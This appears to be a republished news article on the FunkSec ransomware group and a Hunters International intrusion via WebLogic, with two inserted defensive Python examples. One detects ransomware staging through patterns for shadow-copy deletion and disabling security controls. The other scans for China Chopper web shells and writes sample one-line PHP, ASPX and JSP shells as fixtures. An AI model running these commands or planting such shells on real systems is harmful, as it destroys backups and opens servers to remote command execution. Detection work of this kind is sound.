Ptechhub
AI-Driven Ransomware FunkSec Targets 85 Victims Using Double Extortion Tactics

By The Hacker News
January 18, 2025

Cybersecurity researchers have shed light on a nascent artificial intelligence (AI)-assisted ransomware family called FunkSec that first appeared in late 2024 and has claimed more than 85 victims to date.

“The group uses double extortion tactics, combining data theft with encryption to pressure victims into paying ransoms,” Check Point Research said in a new report shared with The Hacker News. “Notably, FunkSec demanded unusually low ransoms, sometimes as little as $10,000, and sold stolen data to third parties at reduced prices.”

FunkSec launched its data leak site (DLS) in December 2024 to “centralize” its ransomware operations. The site hosts breach announcements, a custom tool for conducting distributed denial-of-service (DDoS) attacks, and a bespoke encryptor offered under a ransomware-as-a-service (RaaS) model.

A majority of the victims are located in the U.S., India, Italy, Brazil, Israel, Spain, and Mongolia. Check Point’s analysis of the group’s activity suggests it is likely the work of novice actors seeking notoriety, in part by recycling information from earlier hacktivist-related leaks and presenting it as new breaches.


According to Halcyon, FunkSec is notable for the fact that it functions both as a ransomware group and data broker, peddling stolen data to interested buyers for $1,000 to $5,000.

Check Point also found that some members of the RaaS group have engaged in hacktivist activities, underscoring a continued blurring of boundaries between hacktivism and cybercrime, just as nation-state actors and organized cybercriminals are increasingly exhibiting an “unsettling convergence of tactics, techniques, and even objectives.”

They also claim to target India and the U.S., aligning themselves with the “Free Palestine” movement and attempting to associate with now-defunct hacktivist entities like Ghost Algeria and Cyb3r Fl00d. Some of the prominent actors associated with FunkSec are listed below –

  • A suspected Algeria-based actor named Scorpion (aka DesertStorm) who has promoted the group on underground forums such as Breached Forum
  • El_farado, who emerged as a main figure advertising FunkSec after DesertStorm’s ban from Breached Forum
  • XTN, a likely associate who is involved in an as-yet-unknown “data-sorting” service
  • Blako, who has been tagged by DesertStorm along with El_farado
  • Bjorka, a known Indonesian hacktivist whose alias has been used to claim leaks attributed to FunkSec on DarkForums, pointing either to a loose affiliation or to attempts to impersonate FunkSec

Further evidence that the group also dabbles in hacktivist activity is its tooling: alongside the DDoS attack tools, it maintains a remote desktop tool (JQRAXY_HVNC) and a password generator (funkgenerate).

“The development of the group’s tools, including the encryptor, was likely AI-assisted, which may have contributed to their rapid iteration despite the author’s apparent lack of technical expertise,” Check Point pointed out.

The latest version of the ransomware, named FunkSec V1.5, is written in Rust; the artifact was uploaded to VirusTotal from Algeria. Older versions of the malware contain references to FunkLocker and Ghost Algeria in their ransom notes. Most of these specimens were uploaded from Algeria, possibly by the developer themselves, suggesting that the threat actor is based in the country.

The ransomware binary recursively iterates over all directories and encrypts the targeted files, but not before elevating privileges, attempting to disable security controls, deleting shadow copy backups, and terminating a hard-coded list of processes and services.
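The staging steps described above (shadow copy deletion, disabling security controls, killing a list of processes and services) all surface as process-creation events before any file is encrypted, which is where a defender gets the last cheap detection opportunity. The following is an added example, not code from the article or from Check Point’s report: it correlates per-host process-creation events and alerts when a burst of kills coincides with backup or security tampering. The event records, field names (Computer, ParentImage, CommandLine) and the command-line patterns are constructed for illustration from commonly abused Windows built-ins; they are not claimed to be FunkSec’s exact command lines.

```python
"""Added example (not from the article or Check Point's report): score Windows
process-creation events for the ransomware staging behaviours the text
describes. Events are constructed here; in a real pipeline map them from
Sysmon Event ID 1 or Security Event ID 4688."""
import re
from collections import defaultdict

# Illustrative patterns for the three behaviours the article names. These are
# commonly abused built-ins, not FunkSec's actual command lines (assumption).
SHADOW_COPY_DELETION = [
    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog", re.I),
]
SECURITY_CONTROL_TAMPERING = [
    re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I),
    re.compile(r"\bbcdedit(\.exe)?\b.*recoveryenabled\s+no\b", re.I),
    re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
]
PROCESS_OR_SERVICE_KILL = [
    re.compile(r"\btaskkill(\.exe)?\b.*/IM\s+\S+", re.I),
    re.compile(r"\bnet(\.exe)?\s+stop\s+\S+", re.I),
    re.compile(r"\bsc(\.exe)?\s+(stop|config)\s+\S+", re.I),
]

def classify(cmdline):
    """Return the set of behaviour labels that match one command line."""
    labels = set()
    for name, pats in (("shadow_copy_deletion", SHADOW_COPY_DELETION),
                       ("security_control_tampering", SECURITY_CONTROL_TAMPERING),
                       ("process_or_service_kill", PROCESS_OR_SERVICE_KILL)):
        if any(p.search(cmdline) for p in pats):
            labels.add(name)
    return labels

def score_host(events, kill_threshold=3):
    """Group events per host and return hosts showing correlated staging.

    A single taskkill or net stop is routine admin work. The article describes
    a hard-coded list of processes and services, so the alert condition is a
    burst of kills on one host combined with backup or security tampering.
    """
    per_host = defaultdict(lambda: {"labels": set(), "kills": 0, "parents": set()})
    for ev in events:
        labels = classify(ev["CommandLine"])
        if not labels:
            continue
        h = per_host[ev["Computer"]]
        h["labels"] |= labels
        h["parents"].add(ev["ParentImage"])
        if "process_or_service_kill" in labels:
            h["kills"] += 1
    alerts = {}
    for host, h in per_host.items():
        tampering = h["labels"] & {"shadow_copy_deletion", "security_control_tampering"}
        if tampering and h["kills"] >= kill_threshold:
            alerts[host] = {"behaviours": sorted(h["labels"]),
                            "kill_count": h["kills"],
                            "parents": sorted(h["parents"])}
    return alerts

# Constructed sample events. WS-FIN-07 shows the full staging sequence from one
# parent binary; WS-HR-02 shows a lone admin "net stop" that must not alert.
SAMPLE_EVENTS = [
    {"Computer": "WS-FIN-07", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "WS-FIN-07", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "bcdedit.exe /set {default} recoveryenabled No"},
    {"Computer": "WS-FIN-07", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "taskkill.exe /F /IM sqlservr.exe"},
    {"Computer": "WS-FIN-07", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "taskkill.exe /F /IM outlook.exe"},
    {"Computer": "WS-FIN-07", "ParentImage": r"C:\Users\Public\locker.exe",
     "CommandLine": "net.exe stop MSSQLSERVER /y"},
    {"Computer": "WS-FIN-07", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe invoice.txt"},
    {"Computer": "WS-HR-02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net stop Spooler"},
]

if __name__ == "__main__":
    for host, detail in score_host(SAMPLE_EVENTS).items():
        print(host, detail)
```

The parent image is carried into the alert deliberately: when every staging command descends from one unsigned binary in a user-writable path, that binary is the encryptor candidate to pull for analysis, and the same correlation is what an EDR block rule on “vssadmin delete shadows” from a non-system parent would key on.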


“2024 was a very successful year for ransomware groups, while in parallel, the global conflicts also fueled the activity of different hacktivist groups,” Sergey Shykevich, threat intelligence group manager at Check Point Research, said in a statement.

“FunkSec, a new group that emerged lately as the most active ransomware group in December, blurs the lines between hacktivism and cybercrime. Driven by both political agendas and financial incentives, FunkSec leverages AI and repurposes old data leaks to establish a new ransomware brand, though real success of their activities remains highly questionable.”

The development comes as Forescout detailed a Hunters International attack that likely leveraged Oracle WebLogic Server as an initial entry point to drop a China Chopper web shell, which was then used to perform a series of post-exploitation activities that ultimately led to the deployment of the ransomware.

“After gaining access, the attackers conducted reconnaissance and lateral movement to map the network and escalate privileges,” Forescout said. “The attackers used a variety of common administrative and red teaming tools for lateral movement.”
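Because the Hunters International intrusion above hinged on a web shell dropped onto the application server, a practical response step is to sweep the web root for the one-line shells China Chopper is known for, where a request parameter is passed straight into eval or a command runner. The following is an added example, not code from the article or from Forescout’s report. The ASPX and PHP patterns reflect the widely documented China Chopper one-liners; the JSP pattern and all sample files are constructed for illustration and are not claimed to match a specific sample from the incident.

```python
"""Added example (not from the article or Forescout's report): scan a web
application directory for one-line web shells of the China Chopper type, i.e.
a page that feeds a request parameter directly to eval/exec. Sample files are
constructed and written to a temporary directory so the scan runs offline."""
import os
import re
import tempfile

# Heuristics for "request parameter flows straight into code or command execution".
# The ASPX/PHP forms are the well-known China Chopper one-liners; the JSP line is a
# generic constructed pattern for the Java case (assumption, not a known sample).
SHELL_PATTERNS = {
    "aspx_eval_request": re.compile(r'eval\s*\(\s*Request\.(Item|Form)\s*\[', re.I),
    "php_eval_post":     re.compile(r'@?eval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[', re.I),
    "jsp_exec_param":    re.compile(r'Runtime\.getRuntime\(\)\.exec\s*\(.*request\.getParameter\(', re.I),
}
SCAN_EXTENSIONS = (".aspx", ".asp", ".php", ".jsp", ".jspx")

def scan_file(path):
    """Return the list of pattern names that match the file's contents."""
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    except OSError:
        return []
    return [name for name, pat in SHELL_PATTERNS.items() if pat.search(text)]

def scan_webroot(root):
    """Walk the web root and map each suspicious file (relative path) to its hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(SCAN_EXTENSIONS):
                continue
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings

# Constructed sample web root: one benign page, three planted shells, one decoy
# with a non-scanned extension.
CONSTRUCTED_FILES = {
    "index.jsp": "<html><body><%= request.getParameter(\"user\") %></body></html>\n",
    "help.aspx": "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>",
    "css/x.php": "<?php @eval($_POST['cmd']); ?>",
    "admin/cmd.jsp": "<% Runtime.getRuntime().exec(request.getParameter(\"c\")); %>",
    "readme.txt": "eval(Request.Item[\"pass\"])",
}

def build_sample_webroot():
    """Write the constructed files to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in CONSTRUCTED_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, hits in sorted(scan_webroot(build_sample_webroot()).items()):
        print(rel, hits)
```

Content matching like this catches the commodity one-liners but not obfuscated or compiled shells, so in an actual response it belongs next to a diff of the web root against the deployed artifact and a review of files whose modification time postdates the last legitimate deployment.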
